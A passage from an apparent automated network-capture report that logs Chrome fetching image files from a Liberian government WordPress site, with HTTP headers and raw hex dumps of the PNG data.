                                                                                                                        Data Ascii: ] DZyS{!^n|py^{{}~/m[Bu]h4QzYu|+|m\z wMCBJtCyh7B%v.}!@X(\05`2?~xss/2snBu*^a^^o7]P]] E|v|>ey^c@}_J
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: ad f7 b8 8a 5a 1b 1b 1b ed 56 ab 28 cb d9 6c a6 95 72 2e 4e 75 5d bb 75 05 e0 ca bd 1b e3 ba 45 49 09 00 40 08 55 55 25 a5 6c b5 5a d6 da c9 74 6a 8c e9 f5 7b 4e 24 32 da 68 a3 b5 d6 e7 c3 e1 f9 f9 39 25 64 63 73 33 cb 32 4a e9 65 bf a5 29 25 84 60 ec e6 35 8c b0 e0 5c 69 ed d2 39 57 55 e5 7a a9 2c 4b 17 f4 5d 55 d5 7c 3e 87 08 7d f9 ab 2f 3f 79 f8 d0 95 b0 70 15 15 16 d9 f7 5c 47 5d f1 d0 35 76 25 7c fb bd dc 48 0d 0d 0d 0d 0d 1f 21 1f b0 00 04 d7 ce 03 dd e4 90 7e c7 ac 2e 76 5d b1 59 97 8b 87 ee 4f 29 95 10 ae 10 18 af 19 ab eb ba 28 8a 30 0c fb fd 9e ab 3b ee fb 41 bf df 1f f4 fb 41 e0 65 59 fe c3 0f 4f c6 e3 c9 d6 d6 d6 e7 9f 7f 81 31 ce f2 1c 00 a0 b5 ce b2 ac dd 6e 75 3a 9d ef be fb 2e cb 0b e7 ad e3 56 35 5d d6 9b 28 8e 19 63 b3 e9 74 36 9b 79 94
                                                                                                                        Data Ascii: ZV(lr.Nu]uEI@UU%lZtj{N$2h9%dcs32Je)%`5\i9WUz,K]U|>}/?yp\G]5v%|H!~.v]YO)(0;AAeYO1nu:.V5](ct6y
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: bf fc f1 8f df 7c f3 97 7f fd af ff 75 14 45 55 55 8d 46 17 dd 4e 27 8a e3 fb f7 ef a7 69 3a 9d 4e 07 83 c1 78 3c 0a 82 e0 60 6f 37 2f f2 aa aa ea 9a 0d cf 2f 76 b6 76 81 b5 69 9a 02 00 c3 30 2c f2 ca 1a 8b 10 82 18 42 08 09 41 6e 15 c4 5a 60 a0 41 f0 32 86 c3 d5 08 73 b3 5e 10 04 3b 3b 3b 9b 9b 9b d3 d9 ec f0 d9 d1 70 78 71 78 78 c8 58 95 24 2d c6 b9 31 d6 02 63 81 e9 f7 fa bd 76 e7 e4 d9 71 7a 96 ba c5 92 d9 6c d6 ed 76 3d cf 3b 7c 7a b8 7f b0 bf 31 d8 38 61 27 df 7c f3 cd 6f 7e fb 1b 60 81 10 c2 5a 1b 04 c1 fd fb f7 8f 8f 8f ff eb 7f fb 6f ff fb ff eb ff dd 6a b5 6a 56 cf e7 73 df f7 f7 f7 f7 4f 4f 4f 9f 3d 7b 16 86 e1 60 30 f8 fe fb ef 7f f7 bb df fd f6 b7 bf fd c7 7f fc c7 7e bf ef d6 36 76 a4 80 10 12 84 0d 25 61 18 84 61 38 1a 8d 8e 8e 8e 18 63 f7
                                                                                                                        Data Ascii: |uEUUFN'i:Nx<`o7//vvi0,BAnZ`A2s^;;;pxqxxX$-1cvqzlv=;|z18a'|o~`ZojjVsOOO={`0~6v%aa8c
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 69 f5 07 1d 25 55 51 14 4c a8 3c 2d 05 53 13 31 85 10 f7 7a 03 4a bd 1f 7e 78 52 16 65 ab dd ee 0d fa 93 c9 b4 aa eb a2 2c ff e5 4f 7f fc fc cb 5f 76 07 3d 42 a9 d2 7a 96 ce 93 24 31 c0 0a ad 99 e0 da 1a 65 b4 b1 d6 b8 fa 5d 18 13 42 62 2f d8 3b 38 60 8c 7d fb dd b7 d6 9a 5f 3c fa c5 fd fb f7 bb dd 1e 04 56 08 91 c4 b1 16 52 18 03 11 24 84 62 84 2c 00 c6 18 63 8d 54 d2 58 bb a6 f1 77 ab bc f8 94 7b f9 62 91 05 e8 c5 a6 3b 13 ff c5 6d 5f 64 cd 25 89 f5 7b ed 32 5d fa 0b 0f a2 6b ef b8 e1 6e e1 2e ab 59 70 e5 2a 5f 7f bb da 45 cc a3 0b ec 5a 55 8e 96 3b 07 8b 5b 68 35 3a 6c b9 95 f3 21 52 4a 5d f3 8b 58 75 50 ff b9 3d 1b bf 9a 65 8c 30 58 84 ce 2d 7d 24 8d 31 08 1b 70 19 70 a7 95 32 18 23 4a 31 e3 55 9a a6 93 c9 c4 f3 3d 00 40 9a ce 8d 31 65 59 24 ad c4 f7
                                                                                                                        Data Ascii: i%UQL<-S1zJ~xRe,O_v=Bz$1e]Bb/;8`}_<VR$b,cTXw{b;m_d%{2]kn.Yp*_EZU;[h5:l!RJ]XuP=e0X-}$1pp2#J1U=@1eY$
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 69 96 ce 66 73 c6 58 10 04 db db 5b ab ab bd 30 0a c2 20 68 36 9b 87 87 87 a3 d1 a0 2c cb d1 68 e4 ba 0e c6 84 10 02 20 04 8c 4a 5e 49 00 24 87 52 30 ce 45 9e 13 84 80 52 02 42 c5 79 65 d9 a4 2c cb 38 59 b4 ba ed c8 0f 8b 32 03 50 52 c6 92 3c 8d f3 98 94 d8 b6 4d cf f3 f7 0f 86 93 e9 c4 32 cd a2 cc 7e f7 f1 ff 62 8c ad ac ac dc b8 71 e3 d2 ce ce d6 e6 86 69 5e 1e 8d 46 b7 6f df 7e f8 f0 e1 64 34 da 7f fa d4 f5 7d c3 20 84 18 59 9e 73 ce 7b b8 2b 84 62 82 5a 8e 85 09 a6 ac 56 ca 96 40 42 8c a0 52 10 ca 9a 52 ca a5 50 50 02 04 91 41 19 83 82 99 96 e5 f9 5e 9a a5 a7 38 b8 69 ce 17 0b ce b9 eb ba 94 52 ce 85 ae 6a dd 2f b4 9c 9c 71 a6 13 c6 33 c1 b9 60 35 ab ca b8 2c ab d2 76 2c cf 77 fb fd de c1 fe 91 65 59 b7 6e dd 3a d8 df 5f 2c 16 00 a8 22 cf 2d d3 6c b7
                                                                                                                        Data Ascii: ifsX[0 h6,h J^I$R0ERBye,8Y2PR<M2~bqi^Fo~d4} Ys{+bZV@BRRPPA^8iRj/q3`5,v,weYn:_,"-l
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 00 82 90 18 86 a1 39 50 cb f1 16 42 28 a5 d4 2e 57 86 61 18 c4 e0 82 eb c3 86 25 7e ba 24 5e 61 8c 39 17 8a b3 28 8c b2 3c 47 10 96 65 f9 f1 c7 1f 57 55 f5 d6 9b 6f 47 8d 68 77 77 77 7b 6b 6b 6b 73 0b 28 90 c6 e9 78 3c ce b2 cc f7 fd 28 8a de b8 79 e3 ca e5 cb 61 18 42 00 a5 92 3a 1d 24 17 bc 2c cb d1 68 a4 a7 03 62 18 08 42 8d fb e8 43 02 43 bb af 9b e6 a9 21 34 c4 3f d9 bd e5 2b c6 72 ca 50 67 ff 6a 66 16 00 00 40 08 10 50 54 f0 3c 4f fd 20 b0 1d b3 ae 69 9c 2c 5c d7 31 4d 9d f5 55 fc 30 a5 be 88 8b b8 88 8b f8 11 c7 05 00 74 11 3f a5 58 6e c8 cf af 86 97 b6 2c 4b d3 84 a5 ff c5 72 2f 0a 00 d0 10 8c 02 80 73 4e 41 55 61 d3 b4 ac 4e bb 1d f8 de ce d6 e6 78 34 9d 4e 67 97 2e ed 08 29 47 a3 d1 d1 d1 d1 7c be d0 27 e7 84 10 c3 b2 1c d7 d5 f2 72 2d 31 03 00
                                                                                                                        Data Ascii: 9PB(.Wa%~$^a9(<GeWUoGhwww{kkks(x<(yaB:$,hbBCC!4?+rPgjf@PT<O i,\1MU0t?Xn,Kr/sNAUaNx4Ng.)G|'r-1
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 82 11 c2 24 2d 8a b2 2c c3 30 74 5d 5f 49 a8 a4 d6 6f c9 22 cf b3 24 b3 ed c0 b2 2c cc 31 13 82 71 6a 98 a6 e7 79 00 80 b2 ac ea ba ce 8b d2 20 18 00 09 90 52 40 69 8b 6a cc 39 41 64 59 03 e7 0f ee ce 4e e1 f4 79 26 80 10 d5 75 3d 1a 0d ab aa ae eb cc 73 7d 42 0c c6 58 4d 69 51 14 0a 80 56 bb 9d 24 49 9a 26 9c 73 21 c4 d2 eb d7 30 0c 62 18 52 08 29 04 3a dd aa 81 e5 4a 5a 1b 15 17 65 c1 85 e8 f5 7a bb 8f 77 8f 4f 4e 8e 0e 0f 11 44 3b 3b 3b 1f 7e f4 d1 f5 ab d7 21 44 f7 f6 f7 4e c6 43 d3 30 74 42 99 38 49 d6 57 57 fb 2b 2b 81 ef eb 2b 21 08 5d d7 d5 7c 19 4a a9 65 59 41 e0 db b6 43 69 ad 9d 9b 5f a5 b5 a8 33 4f 65 cb b2 30 26 75 5d 53 ed 94 64 98 86 61 d6 ac d6 38 97 d6 ad 30 ce 8f 8f 8f ab ba ea af ac 08 00 66 f3 79 9a 24 b6 65 75 bb dd f1 78 7c 78 78 a8
                                                                                                                        Data Ascii: $-,0t]_Io"$,1qjy R@ij9AdYNy&u=s}BXMiQV$I&s!0bR):JZezwOND;;;~!DNC0tB8IWW+++!]|JeYACi_3Oe0&u]Sda80fy$eux|xx
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 4a 2a 3d fb 83 d3 a3 28 a5 5b 38 80 08 61 84 11 00 80 52 9a 17 45 9a a6 65 51 0a ce 35 43 59 af 18 00 50 e0 74 69 c1 04 67 42 30 29 38 50 92 10 6c 98 c4 b0 61 1c 4f 8b 22 b5 4c 0c a0 5c cc 46 d3 c9 28 5e 2c c6 93 e1 e1 c1 fe c9 f1 d1 74 32 4e d3 54 09 ce 39 b3 6d bb d9 6c 4a 29 1a 8d 86 6d d9 42 4a 83 58 67 8e 87 e8 fc f2 e0 1b 09 e3 7f de b8 00 80 be 2d 7e 4c 00 10 fc 0f fe ff e2 f8 61 01 a0 ef fd d0 d4 05 00 f4 7d e3 27 0c 00 bd de 34 f0 2f 91 60 00 a0 5e 5c f8 17 be fb 0d 2b a6 af dd 7d d9 e6 96 83 fe 57 6f a1 17 b7 f5 17 5e fa 3b 7c b5 97 7d fe a5 7f f1 3d 6f 0d fe 1c 30 ca eb fb f8 ab c4 f7 f8 e2 e7 17 52 5c 62 a5 14 04 02 42 84 96 2d 41 2a c1 85 52 2a 5b e4 d3 d9 d4 f7 fd 28 8a 1a 51 63 67 73 b3 15 45 83 e1 e0 f0 f0 70 f7 c1 bd 27 8f ee 6f 6e 6d 76
                                                                                                                        Data Ascii: J*=([8aREeQ5CYPtigB0)8PlaO"L\F(^,t2NT9mlJ)mBJXg-~La}'4/`^\+}Wo^;|}=o0R\bB-A*R*[(QcgsEp'onmv
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 3f f8 e0 c3 f7 de a9 d5 aa 08 f3 d1 64 bc b7 bf b3 0c 02 cb b2 0c 53 cf d2 34 0c 83 34 4b 82 60 99 24 11 a5 a5 90 02 42 e1 fb 1e 21 98 73 56 96 65 ad 5a b5 2c ab 2c cb 2c cb 74 dd 50 4d 5a 96 67 9a a1 35 bd 2a a5 dc b2 2c 84 90 a1 9b b5 5a cd f3 7d 08 51 bb dd 36 4d 9d 73 c9 39 10 02 43 08 a3 28 3a 3d 3d 5d 2e 97 86 61 58 e7 99 89 8a 11 cc 38 27 e7 1d c2 45 bd 3e ba f8 95 1e f5 cb ba ac df 81 fa a5 0b d4 e5 73 f4 1b 58 f8 bf fc 1b 96 80 fd 23 0c d9 2f 25 60 bf 45 f5 2b 7e 2e 15 13 2e cf 95 29 17 94 04 f5 45 59 96 6a 08 66 db b6 ea 27 ca b2 2c 8a a2 2c 4b 65 c3 a1 a4 61 51 14 e5 79 ae b6 e2 ed 76 1b 22 34 1e 8f fb 27 fd 24 cb 2a 15 df af f8 69 9a 8e 86 a3 c9 74 42 19 35 0c c3 f5 5c d7 f3 4f 47 c3 97 cf 9f 3a b6 79 e3 da f5 5a a5 ba 5c 04 e1 32 b0 0c 43 4a
                                                                                                                        Data Ascii: ?dS44K`$B!sVeZ,,,tPMZg5*,Z}Q6Ms9C(:==].aX8'E>sX#/%`E+~..)EYjf',,KeaQyv"4'$*itB5\OG:yZ\2CJ


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        16192.168.2.74977569.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:45 UTC610OUTGET /wp-content/uploads/2024/01/logo-1.png HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:46 UTC365INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:46 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 17 Jan 2024 14:51:58 GMT
                                                                                                                        ETag: "49c61-60f2563892bfc"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 302177
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:46 GMT
                                                                                                                        Vary: User-Agent,Accept-Encoding
                                                                                                                        Content-Type: image/png
                                                                                                                        2025-01-10 13:54:46 UTC7827INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 ae 00 00 01 9a 08 06 00 00 00 57 1e a7 21 00 00 00 09 70 48 59 73 00 00 0b 89 00 00 0b 89 01 37 c9 cb ad 00 00 19 d7 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 32 20 37 39 2e 31 36 34 34 36 30 2c 20 32 30 32 30 2f 30 35 2f 31 32 2d 31 36 3a 30 34 3a 31 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44
                                                                                                                        Data Ascii: PNGIHDRW!pHYs7iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RD
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 44 08 0c 82 8b c0 e9 e0 59 d7 31 0f 75 57 d5 33 c1 a4 c7 85 40 07 bc 04 ab 90 1e 21 03 32 2a f1 5e a0 f0 22 78 4f e3 00 09 c1 1b 6c 70 c8 5a a3 42 84 52 0a 21 24 89 36 18 13 81 94 08 2f 88 9d 26 12 11 33 02 24 8a 48 28 8c 85 20 3d 33 5b 91 ea 08 14 34 72 ae 18 91 f5 80 a5 f4 0d b5 0c 38 19 08 de 21 1a 8b ab 0b 42 70 04 61 71 58 3c 10 84 02 1f 08 2a 60 fa 3c 26 a5 7f 2c 84 06 1d 3c 21 04 3c 12 9c 0c d2 4b 2f 9c 9a 86 46 5c 71 33 f1 3a 81 37 80 cb 08 76 10 6c 22 78 0b 41 89 58 48 d7 82 f7 3e 0b e1 5a f0 1e 42 cc 77 3e 21 80 03 02 bd e0 c3 4f 48 2b 3f 82 71 4b e2 e4 2c 6e a9 90 48 63 ce 0a 25 3a 81 42 20 a7 a9 57 64 b5 0b 12 40 7e 6f d9 f6 12 81 44 d6 f3 a3 9c 44 a7 0c bb 6b 74 d2 15 5c 23 10 22 c6 49 c9 4a b2 ca 72 bc 0c 02 42 90 2c 0d 87 20 23 ca c6 91 e9
                                                                                                                        Data Ascii: DY1uW3@!2*^"xOlpZBR!$6/&3$H( =3[4r8!BpaqX<*`<&,<!<K/F\q3:7vl"xAXH>ZBw>!OH+?qK,nHc%:B Wd@~oDDkt\#"IJrB, #
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 92 6a 3e 34 2b a0 9d b4 19 b6 86 14 ae 66 94 8f 89 1a 4f af dd a6 d7 ea 60 cb 8a ed c9 3e 9d 54 93 68 83 b3 1e 2d 24 4b ed 3e 59 94 71 fb f6 6b 6c 4e ae 90 87 09 dd 54 a0 84 c1 c6 1a 23 1c 22 18 94 33 04 61 f0 a2 64 67 72 83 cf bc f1 2b 9c 38 71 3f ef 3b f9 13 2c cb 1e 51 02 c6 24 5c b9 bd 45 e9 04 b1 49 51 2e e0 ac a7 97 b4 38 d1 5b e6 5a 7e 80 32 3d ba ed 75 36 f3 eb 20 25 20 10 47 13 bf d6 4a 2a 2a ea ea 90 25 25 d1 71 9f ad 02 ca 00 71 26 29 ec 6d b6 76 2f 31 9a 8d e7 33 66 40 08 0a 8f c0 36 35 06 48 d2 55 ea a8 c5 a8 29 48 55 c4 46 6b 48 a4 0c 3b f9 88 49 35 03 29 28 7d 45 73 24 26 08 77 f4 3e 10 ac e1 c4 ca 3d a4 5a 83 83 e0 3d 5a 2a 0c b0 37 be cd b8 da 65 d0 e9 d0 6e 24 6f be f2 4d 76 f3 6b 10 1c da 2b 1a 17 d0 2a e3 e4 da 05 b6 b6 6e e3 9d 9b bf
                                                                                                                        Data Ascii: j>4+fO`>Th-$K>YqklNT#"3adgr+8q?;,Q$\EIQ.8[Z~2=u6 % GJ**%%qq&)mv/13f@65HU)HUFkH;I5)(}Es$&w>=Z=Z*7en$oMvk+*n
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 8f 22 38 81 17 a0 45 4c b0 15 af dd 7e 8e 7f f1 d5 7f c8 a7 3f f8 5f d2 51 eb 8c 66 53 ac 52 48 6d 48 44 86 11 19 73 1f 8e a3 24 cd e0 99 1f e8 59 0a 7b c0 f6 e4 36 b7 f3 7d e2 a8 85 d3 70 38 39 e0 58 b6 ce bd a7 3f c0 4b 3b 7f c8 cd ed b7 69 f7 25 01 07 de cc 77 1e 1e 34 1e 19 5b 5e bd fc 05 1e 5c 7f 8a f6 72 46 c6 10 9d 4a f2 66 8a f7 12 81 9e 9b cb 0a 8f 53 96 0a 4f 9a 44 34 de b3 55 e4 94 4d 45 43 cc ea f0 04 3b e5 14 69 1b a4 d0 f3 a6 0c 04 be 84 b5 ce 79 56 7b e7 10 c2 b0 37 1d b1 3f db 61 6a c7 c8 e0 50 47 37 90 3f da fd 08 15 33 b6 05 53 59 53 47 8e 59 95 73 98 cf 9d dd 6f cf be cb 77 af 7d 86 d9 64 9b 56 2b a6 09 1a 25 34 3e 30 9f c9 92 8e 48 40 a4 0c 5f 78 e9 9f 53 1c dc 60 30 b8 c0 60 e9 3c 91 88 c8 5d 89 75 47 c9 d7 c2 cf 4f 34 99 77 85 56 65
                                                                                                                        Data Ascii: "8EL~?_QfSRHmHDs$Y{6}p89X?K;i%w4[^\rFJfSOD4UMEC;iyV{7?ajPG7?3SYSGYsow}dV+%4>0H@_xS`0`<]uGO4wVe
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 71 df 18 a4 d0 fd b2 23 3c 46 f4 de a9 c8 c5 dc 37 7c 90 51 74 83 a7 1f ff 66 1e bf f2 7e 26 62 8f 69 3e e2 e6 6b c7 88 c9 90 eb 97 9e 64 7b eb 5e 8e 4f 4e 19 a7 16 69 22 9c 00 e1 05 a1 0c 68 7d c5 4b 47 5f e0 95 c3 df e0 fa e0 06 69 70 99 c5 ea 9c 5b 67 af d0 76 0d b2 0b 18 ab 1d b2 30 21 cb c6 6c 4d 1f 65 2b b9 97 f7 3d f2 21 c2 7a 8b d6 1a 88 e0 b8 2c b8 b9 5c 32 2f ce 98 0e b6 10 81 e4 7c 73 4c 53 b4 68 11 22 84 23 8e 34 4a 29 9c 0f e9 7c cb f1 fa 1c 59 1a 5a 03 51 9e a1 08 58 d6 35 77 57 27 2c 56 0b c2 f1 90 50 87 d4 a6 c2 49 c9 69 53 e2 d6 47 a8 ce 13 28 c5 68 30 60 be 5e 71 5a d5 b4 6d 47 6b 3a 86 32 24 74 12 63 2c 04 9a f3 72 4d d9 d4 c4 5e 30 89 33 72 1d 72 da b6 9c ae cf 51 b2 f7 35 0d e2 98 42 28 a4 e8 9b de a2 58 e1 84 c3 d5 2d 3b b3 2d 3a 6b
                                                                                                                        Data Ascii: q#<F7|Qtf~&bi>kd{^ONi"h}KG_ip[gv0!lMe+=!z,\2/|sLSh"#4J)|YZQX5wW',VPIiSG(h0`^qZmGk:2$tc,rM^03rrQ5B(X-;-:k
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: df 5e 32 b7 7f b5 f5 76 e3 fa 9f ab 7e 0a 77 55 25 fe c7 f4 7e fb 47 5a 64 32 f6 7b bc ef de ef e4 3b 9f f9 c3 3c 9e 3e 89 40 a0 2e 82 fe c6 d9 90 51 96 e3 f1 28 54 3f b7 4f 34 56 08 ea b6 e4 7a bc cd 63 7b 8f f0 ca d9 94 a2 5a a2 50 48 04 52 80 b2 bd 92 51 86 70 67 fe 1a ff e8 f3 7f 9b d9 07 af f1 c8 ee d3 4c e5 84 00 30 be e1 e6 f9 57 98 af de c0 fa 16 ad fb 46 e0 84 45 38 c1 84 21 4f 5d 7e 86 47 76 ee 61 9a 48 20 01 1c 61 3a c5 a6 02 81 47 d3 87 af 4f a2 11 1f 7c e2 db f9 e2 ed 5f e1 8d f9 0a 19 f4 e0 db 56 b6 a8 0e b4 54 fd 28 a9 f6 88 a6 06 3d 60 90 0f b1 4d c1 98 90 4b f9 88 cb a3 ad fe 9e c0 59 74 90 10 87 09 16 50 78 42 24 26 f6 68 02 82 52 33 f6 09 83 d1 80 41 90 10 e2 91 5e 12 a5 43 26 69 8e 14 b2 0f 65 c4 93 c6 39 9d b3 b4 9d e1 72 3e e5 f2 f8
                                                                                                                        Data Ascii: ^2v~wU%~GZd2{;<>@.Q(T?O4Vzc{ZPHRQpgL0WFE8!O]~GvaH a:GO|_VT(=`MKYtPxB$&hR3A^C&ie9r>
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 7e 71 ed 44 c3 bc 6d 30 9b 53 0e ce 5e e1 6b 37 7f 95 cf c5 fb ec cd 1e e4 da ee 7d 3c 38 7b 90 fb 67 ef 60 3a bc 81 0c c6 e4 c1 80 69 9a 63 a3 0c a9 c4 9b 89 54 cb 7a c5 e9 aa 62 7f 76 85 54 f6 77 29 45 55 51 d5 25 59 96 b3 b3 bd 4d a4 23 d4 c5 c9 b2 b5 86 93 cd 8a d6 59 f6 87 53 02 fa 85 79 59 15 94 5d c5 fe 70 c6 b6 88 88 2f 36 0e 5e 40 e1 0c 77 96 c7 8c d2 01 b3 68 80 92 82 d6 18 8e d6 73 62 a5 18 65 39 51 18 f7 ef 2e d9 83 7f 17 e5 86 75 53 32 c9 c7 44 71 7f b7 d5 98 96 a3 93 63 86 d3 29 83 3c c7 59 47 87 23 10 8a c2 14 fc dc 97 7e 9a 4f bd fa 49 1a e1 49 65 82 72 0e 23 2c 4e 49 b4 90 74 5d 05 3e e0 9d 37 be 91 8f 3e fe 03 8c e2 1d ce 16 0b 3a d9 b1 37 dc c6 01 06 cf c1 fc 84 20 0c 99 0c 27 84 3a 44 a3 71 78 14 92 a2 a9 d9 b4 15 83 7c 44 2e 34 1a 41
                                                                                                                        Data Ascii: ~qDm0S^k7}<8{g`:icTzbvTw)EUQ%YM#YSyY]p/6^@whsbe9Q.uS2Dqc)<YG#~OIIer#,NIt]>7>:7 ':Dqx|D.4A
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 05 f5 ea 04 23 14 97 c7 7b 34 42 50 e3 88 7c 4d 5b 5a 6c 27 e9 c4 88 b7 3d f4 21 4e ea 23 3e fe fc 6f f2 ce c7 7e 80 b7 5f ff 00 fb a3 37 d1 05 68 44 c3 c6 6e a9 5d c7 a6 ae a9 db 0a 23 35 a3 6c 40 50 92 85 ad 70 cb 43 8c 54 0c b2 9c 24 4a 69 08 d8 d0 e1 9c a4 aa 36 b4 4d cb 28 4a d9 4d 06 f8 10 38 0f 0d 8b e2 14 11 02 07 26 c7 25 11 65 db 32 70 8e aa ab 29 b6 1b da ae 25 36 31 fb d3 1d 0a 5f b3 29 2d 26 28 64 36 40 e7 86 db dd cb 7c f2 8b 9f e0 f3 b7 7f 8b 97 cf 3e c6 7c fd 0a 44 1e 2f 2d b6 11 34 b5 22 57 33 ee dd 7f 80 b7 5e 7f 82 77 3f f8 4d 18 77 95 fd c1 4d 86 62 9f c3 ed 8a a6 9a a3 65 c3 c1 74 0f 6f 60 b9 ad 39 9f 57 0c 74 bf e0 a8 82 a7 c2 e3 82 45 f9 9a a2 28 60 5d 30 18 8e 18 8c 26 54 0a ee d6 1b ba 53 c7 be c9 19 4f 66 34 40 69 1b 5a df 51 95
                                                                                                                        Data Ascii: #{4BP|M[Zl'=!N#>o~_7hDn]#5l@PpCT$Ji6M(JM8&%e2p)%61_)-&(d6@|>|D/-4"W3^w?MwMbeto`9WtE(`]0&TSOf4@iZQ
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 02 52 49 2e 0d 26 b4 c1 73 52 17 74 cd 92 49 d7 b0 3b 9e 52 7a 8f 0d 9e ce 77 ac ca 0a 6f 03 b2 f5 0c e3 0c 1d 09 4e b7 e7 9c 95 15 d7 76 1e e5 5b be e6 06 d7 f6 de c8 2f 3f fd 93 7c e2 ee af d3 75 1d 2a 17 54 4d cb c7 5f fb 75 d6 cd 92 6f b0 27 ec 0f df c8 6e f4 10 ed ba 45 44 1d 3e 52 14 be 23 41 b1 ad 2a 6a 51 50 36 35 83 a0 18 0f 47 34 0a 36 5d 4b 57 ad 69 f1 a4 28 e2 38 a5 72 2d 5e f6 60 e2 b3 62 85 04 26 32 66 6a 26 34 c1 31 6f b7 54 ae a5 6c 73 d2 7c d0 c3 9e 83 67 db 36 54 78 56 a1 45 36 fd 6e 55 44 11 5b 19 d8 b6 1b fc 56 91 58 98 cc 66 54 c1 61 42 bf fb 99 2f 16 04 dd e3 c6 ae 0d 77 71 02 96 be e2 ac 76 6c eb 92 cb 83 1d 02 9a b5 9d f3 f4 e1 6f f1 d9 3b 3f c7 c7 9f fe 39 9c 6c 88 c7 31 89 4c fb df 45 8f 91 02 4d 08 82 ce 39 5c 90 24 69 ca cc 3c
                                                                                                                        Data Ascii: RI.&sRtI;RzwoNv[/?|u*TM_uo'nED>R#A*jQP65G46]KWi(8r-^`b&2fj&41oTls|g6TxVE6nUD[VXfTaB/wqvlo;?9l1LEM9\$i<
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 51 c2 62 b5 24 9d 8c 59 b7 15 87 f3 d3 1e 7f 66 6b f2 34 67 de 15 9c d6 1b b6 5d d3 5b 19 94 60 51 6e 30 91 c1 ca c0 49 bd e1 a4 5c b1 ac 36 a0 04 91 8a 98 57 5b 8e cb 15 b5 70 2c ca 0d 69 9a b3 dd 6c 51 4a e2 63 c5 8b e7 87 2c 7d cb a2 2a d8 cf 2e 31 1e ec 71 ab b8 c3 e7 6e 7f 8e 38 f1 28 22 82 0c 48 7c af dc 95 81 eb e3 47 78 f7 03 3f cc d7 3f fc 43 3c b8 f7 66 84 52 2c 95 c5 fb 96 f9 ea 98 6d d8 12 1b 8d e9 02 a7 e5 09 b7 4e 9e e1 73 77 7f 83 27 8f 3f c6 71 7d 1b 8c 45 4a 90 04 54 88 f0 f4 78 aa 2c ce 79 fc d2 7b d9 1b 3f c0 51 db 70 b8 39 a3 ea 6a bc 0c 78 2d 79 e1 f4 2e 8d 09 d4 de d2 b6 1d 71 92 d0 06 45 1a 45 dc 3e 7c 9e f3 ea 18 93 b2 13 1a 6f db 26 7c 0a 78 7d f9 7f ff c6 f1 e7 bf fb 0f f8 c4 f5 b7 7f e6 3f e9 e9 c6 af f3 49 9f 71 b5 93 0d cd ff
                                                                                                                        Data Ascii: Qb$Yfk4g][`Qn0I\6W[p,ilQJc,}*.1qn8("H|Gx??C<fR,mNsw'?q}EJTx,y{?Qp9jx-y.qEE>|o&|x}?Iq


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        17192.168.2.74977869.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:46 UTC632OUTGET /wp-content/plugins/revslider/public/assets/assets/dummy.png HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
